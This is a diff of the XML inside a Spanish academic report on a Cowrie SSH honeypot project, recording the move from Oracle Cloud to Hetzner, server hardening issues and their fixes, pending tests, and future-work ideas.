         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -19816,6 +19957,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -19846,7 +19988,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">El script oci_a1_retry.py se desarrolló para resolver la falta de capacidad de instancias A1 en la región. Utiliza el SDK oficial de Oracle para Python y se autentica con una clave de API asociada al usuario, cuyo fichero privado permanece en el equipo del administrador y está excluido del repositorio mediante .gitignore.</w:t>
+        <w:t xml:space="preserve">El script oci_a1_retry.py se desarrolló para resolver la falta de capacidad de instancias A1 en la región. Utiliza el SDK oficial de Oracle para Python y se autentica con una clave de API asociada al usuario, cuyo fichero privado permanece en el equipo del administrador y está excluido del repositorio mediante .gitignore. Aunque finalmente Oracle no tuvo capacidad disponible y el proyecto se desplegó en Hetzner Cloud, la herramienta se documenta porque formó parte del trabajo realizado y es reutilizable por cualquier usuario del tier gratuito de Oracle.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -20340,6 +20482,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -20376,6 +20519,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
         <w:pageBreakBefore/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="center"/>
@@ -20413,6 +20557,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -20449,6 +20594,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -20485,6 +20631,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -20578,6 +20725,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -21217,6 +21365,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -21818,6 +21967,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -22469,6 +22619,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -23036,12 +23187,13 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">El script se encuentra en ejecución real contra la cuenta del proyecto desde el 3 de octubre de 2026. Las primeras peticiones confirmaron que la autenticación con la clave de API, el descubrimiento de recursos y el tratamiento del error de capacidad funcionan contra la API real.</w:t>
+        <w:t xml:space="preserve">El script se ejecutó contra la cuenta real del proyecto los días 3 y 4 de octubre de 2026. Las peticiones confirmaron que la autenticación con la clave de API, el descubrimiento de recursos y el tratamiento del error de capacidad funcionan contra la API real, aunque en más de 600 intentos Oracle no llegó a tener capacidad disponible, lo que motivó el cambio de proveedor.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -23078,6 +23230,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -23089,7 +23242,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Pruebas Pendientes en el Servidor</w:t>
+        <w:t xml:space="preserve">Despliegue en Hetzner Cloud</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23108,7 +23261,180 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Las siguientes pruebas de la tabla RFTP requieren el servidor desplegado y se documentarán, con sus capturas, en cuanto la instancia esté disponible:</w:t>
+        <w:t xml:space="preserve">El 4 de octubre de 2026 se creó el servidor en Hetzner Cloud y se ejecutó el script de bastionado. El despliegue real sacó a la luz dos incidencias que las pruebas locales no podían detectar, porque dependen del sistema real del proveedor.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Incidencia: Validación de sshd en Ubuntu 24.04</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">En la primera ejecución, el script se detuvo al configurar el SSH con el mensaje «Missing privilege separation directory: /run/sshd» y deshizo el cambio. La configuración era correcta: el fallo se debía a que Ubuntu 24.04 arranca sshd por activación de socket, y el directorio /run/sshd solo existe mientras el servicio está en marcha. La validación previa con sshd -t lo exige, y al no encontrarlo daba la configuración por errónea.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El comportamiento del script en ese momento fue el diseñado: ante cualquier duda sobre la configuración del SSH, revertir el cambio y no reiniciar el servicio, de modo que la sesión del administrador nunca llegó a correr peligro. La corrección consistió en crear el directorio antes de validar. Al relanzar el script, completó el resto de pasos sin repetir los ya hechos, gracias a su diseño idempotente.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Incidencia: Clave SSH sin Frase Conocida</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El servidor se creó inicialmente con una clave SSH existente en el equipo del administrador cuya frase de paso no se recordaba, por lo que no fue posible acceder. Como el servidor estaba recién creado y vacío, la solución más segura fue generar una clave ed25519 nueva y dedicada al proyecto, guardar su frase en el gestor de contraseñas en el momento de crearla y volver a crear el servidor con ella. La lección aplicada es usar una clave distinta por proyecto o servicio, con su frase registrada desde el principio.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Resultados del Bastionado</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tras la segunda ejecución del script, el usuario diego accede por el puerto 2022 con la clave dedicada. Al instalar iptables-persistent, el sistema desinstaló automáticamente UFW, que venía instalado pero inactivo en la imagen de Hetzner, lo que confirma la incompatibilidad entre ambas herramientas comentada en el capítulo de Tecnología.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pruebas Pendientes en el Servidor</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Las siguientes pruebas de la tabla RFTP se documentarán, con sus capturas, a medida que avance el despliegue:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23127,7 +23453,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Conexión SSH al puerto 2022 con clave y rechazo con contraseña y como root (R01F02).</w:t>
+        <w:t xml:space="preserve">Rechazo del acceso SSH como root y con contraseña en el puerto 2022 (R01F02).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23146,7 +23472,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Escaneo con nmap desde el exterior: solo los puertos 22 y 2022 visibles (R01F02T01P01).</w:t>
+        <w:t xml:space="preserve">Persistencia de las reglas de iptables y del SSH en el 2022 tras un reinicio del servidor.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23165,7 +23491,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Conexión al puerto 22 que aterriza en Cowrie con la identidad web-prod-02 (R02F01T03P01).</w:t>
+        <w:t xml:space="preserve">Escaneo con nmap desde el exterior: solo los puertos 22 y 2022 visibles (R01F02T01P01).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23184,7 +23510,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Ataque controlado desde Kali Linux con hydra y verificación en cowrie.json (CU-03).</w:t>
+        <w:t xml:space="preserve">Conexión al puerto 22 que aterriza en Cowrie con la identidad web-prod-02 (R02F01T03P01).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23203,7 +23529,63 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Reserva de memoria activa y uso de memoria superior al 20 % en las métricas de OCI.</w:t>
+        <w:t xml:space="preserve">Ataque controlado desde Kali Linux con hydra y verificación en cowrie.json (CU-03).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
+        <w:pageBreakBefore/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Trabajos Futuros</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El proyecto sienta las bases para diversas líneas de ampliación y mejora que podrían desarrollarse como continuación de este trabajo, como proyecto de Máster o como implementación profesional en un entorno corporativo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Evolución del Honeypot</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23219,64 +23601,20 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Persistencia de las reglas de iptables y de los servicios tras un reinicio del servidor.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:pageBreakBefore/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Trabajos Futuros</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">El proyecto sienta las bases para diversas líneas de ampliación y mejora que podrían desarrollarse como continuación de este trabajo, como proyecto de Máster o como implementación profesional en un entorno corporativo.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Evolución del Honeypot</w:t>
+        <w:t xml:space="preserve">Honeypot de alta interacción: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sustituir Cowrie por un sistema que proporcione un Linux real al atacante (mediante contenedores Docker o máquinas virtuales aisladas con snapshots automáticos), permitiendo capturar comportamientos más avanzados como escalada de privilegios, movimiento lateral, instalación de rootkits y comunicación con servidores de comando y control (C2). La configuración de Cowrie con backend proxy hacia una VM real ya lo soporta, aunque requiere un aislamiento riguroso.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23297,15 +23635,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Honeypot de alta interacción: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sustituir Cowrie por un sistema que proporcione un Linux real al atacante (mediante contenedores Docker o máquinas virtuales aisladas con snapshots automáticos), permitiendo capturar comportamientos más avanzados como escalada de privilegios, movimiento lateral, instalación de rootkits y comunicación con servidores de comando y control (C2). La configuración de Cowrie con backend proxy hacia una VM real ya lo soporta, aunque requiere un aislamiento riguroso.</w:t>
+        <w:t xml:space="preserve">Honeypot multi-protocolo: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ampliar la captura a otros servicios frecuentemente atacados: HTTP (ataques a paneles de administración, exploits de aplicaciones web), Telnet (IoT), FTP (credenciales y malware), SMB (ransomware, EternalBlue). Plataformas como T-Pot integran más de 20 honeypots diferentes en un único despliegue con Docker Compose, aunque requieren significativamente más recursos.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23326,15 +23664,33 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Honeypot multi-protocolo: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ampliar la captura a otros servicios frecuentemente atacados: HTTP (ataques a paneles de administración, exploits de aplicaciones web), Telnet (IoT), FTP (credenciales y malware), SMB (ransomware, EternalBlue). Plataformas como T-Pot integran más de 20 honeypots diferentes en un único despliegue con Docker Compose, aunque requieren significativamente más recursos.</w:t>
+        <w:t xml:space="preserve">Red distribuida de honeypots: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">desplegar instancias de Cowrie en múltiples regiones cloud (Europa, América, Asia) para comparar los patrones de ataque por zona geográfica y detectar campañas globales coordinadas. Los datos podrían centralizarse en un único dashboard para su correlación.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Mejora del Análisis</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23355,32 +23711,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Red distribuida de honeypots: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">desplegar instancias de Cowrie en múltiples regiones cloud (Europa, América, Asia) para comparar los patrones de ataque por zona geográfica y detectar campañas globales coordinadas. Los datos podrían centralizarse en un único dashboard para su correlación.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Mejora del Análisis</w:t>
+        <w:t xml:space="preserve">Análisis de malware: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">integrar un sandbox como Cuckoo Sandbox o el servicio cloud de ANY.RUN para analizar automáticamente los binarios descargados por los atacantes, extrayendo indicadores de compromiso (IOC) adicionales: hashes, dominios contactados, claves de registro modificadas y comportamiento en red.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23401,15 +23740,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Análisis de malware: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">integrar un sandbox como Cuckoo Sandbox o el servicio cloud de ANY.RUN para analizar automáticamente los binarios descargados por los atacantes, extrayendo indicadores de compromiso (IOC) adicionales: hashes, dominios contactados, claves de registro modificadas y comportamiento en red.</w:t>
+        <w:t xml:space="preserve">Machine learning para detección de patrones: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">aplicar algoritmos de clustering (K-Means, DBSCAN) sobre las sesiones de ataque para identificar grupos de atacantes con comportamientos similares, detectando campañas coordinadas o variantes de un mismo bot. Las características podrían incluir secuencias de comandos, intervalos temporales y credenciales probadas.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23430,15 +23769,33 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Machine learning para detección de patrones: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">aplicar algoritmos de clustering (K-Means, DBSCAN) sobre las sesiones de ataque para identificar grupos de atacantes con comportamientos similares, detectando campañas coordinadas o variantes de un mismo bot. Las características podrían incluir secuencias de comandos, intervalos temporales y credenciales probadas.</w:t>
+        <w:t xml:space="preserve">Visualización geográfica interactiva: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">generar un mapa interactivo (Leaflet o Folium) con la distribución geográfica de los atacantes, actualizándose en tiempo real conforme se registran nuevos ataques. Incluir líneas de flujo que muestren las rutas de ataque y heatmaps de densidad por región.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Integración y Automatización</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23459,32 +23816,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Visualización geográfica interactiva: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">generar un mapa interactivo (Leaflet o Folium) con la distribución geográfica de los atacantes, actualizándose en tiempo real conforme se registran nuevos ataques. Incluir líneas de flujo que muestren las rutas de ataque y heatmaps de densidad por región.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Integración y Automatización</w:t>
+        <w:t xml:space="preserve">Automatización con Wazuh: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">desarrollar reglas personalizadas y decodificadores en Wazuh que generen alertas en tiempo real cuando se detecten patrones de ataque específicos: más de 100 intentos de login desde la misma IP en una hora, descarga de binarios con hashes conocidos como malware, o ejecución de comandos asociados a técnicas MITRE ATT&amp;CK concretas.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23505,15 +23845,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Automatización con Wazuh: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
